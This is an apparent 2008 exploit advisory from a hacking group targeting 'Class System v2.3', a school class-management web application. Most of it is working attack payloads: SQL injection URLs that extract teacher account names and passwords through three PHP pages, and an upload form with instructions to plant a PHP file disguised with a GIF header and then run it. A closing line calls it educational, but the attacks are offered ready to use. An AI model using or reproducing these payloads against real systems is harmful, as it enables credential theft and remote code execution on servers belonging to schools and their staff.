_____ _ _ _____ _____ _____ _____ / ___| |_| | _ \| _ | _ |_ _| | (___| _ | [_)_/| (_) | (_) | | | \_____|_| |_|_| |_||_____|_____| |_| C. H. R. O. O. T. SECURITY GROUP - -- ----- --- -- -- ---- --- -- - http://www.chroot.org _ _ _ _____ ____ ____ __ _ Hacks In Taiwan | |_| | |_ _| __| | \| | Conference 2008 | _ | | | | | (__| () | | |_| |_|_| |_| \____|____|_|\__| http://www.hitcon.org Title :: Class System v2.3 Multiple Remote Vulnerabilities Author :: unohope [at] chroot [dot] org IRC :: irc.chroot.org #chroot ScriptName :: ???????? v2.3 Download :: http://netlab.kh.edu.tw/download/classman/ClassSystemV2.zip http://netlab.kh.edu.tw/download/classman/ClassSystemV2.3.zip Mirror :: http://www.badongo.com/file/9542454 http://www.badongo.com/file/9542460 _______________ [SQL Injection] - {HomepageTop.php} - http://localhost/class/HomepageTop.php?teacher_id=-99'+union+select+0,1, teacher_password,teacher_account,4,5+from+teacher/* - {HomepageMani.php} - http://localhost/class/HomepageMain.php?teacher_id=-99'+union+select+0,t eacher_account,2,3,4,5,6,7,teacher_password+from+teacher/* - {MessageReply.php} - http://localhost/class/MessageReply.php?teacher_id=1&message_id=-99'+uni on+select+teacher_account,teacher_password,3,4+from+teacher/* ____________________ [Upload Arbitrarily] - {Apply.php} - <form enctype="multipart/form-data" action="http://localhost/class/ApplyDB.php" method="post"> <input type="hidden" name="teacher_account" value="blah1"> <input type="hidden" name="teacher_password" value="blah1"> <input type="file" name="uploadfile" size="40"><br> <input type="submit" value="send"> </form> Just upload a foo.php with GIF89a header, and go to url as following .. http://localhost/class/UploadHomepage/[your_account_id]_1.php then enjoy it .. ______ [NOTE] !! This is just for educational purposes, DO NOT use for illegal. !! # 2008/5/24 - chrO.ot group #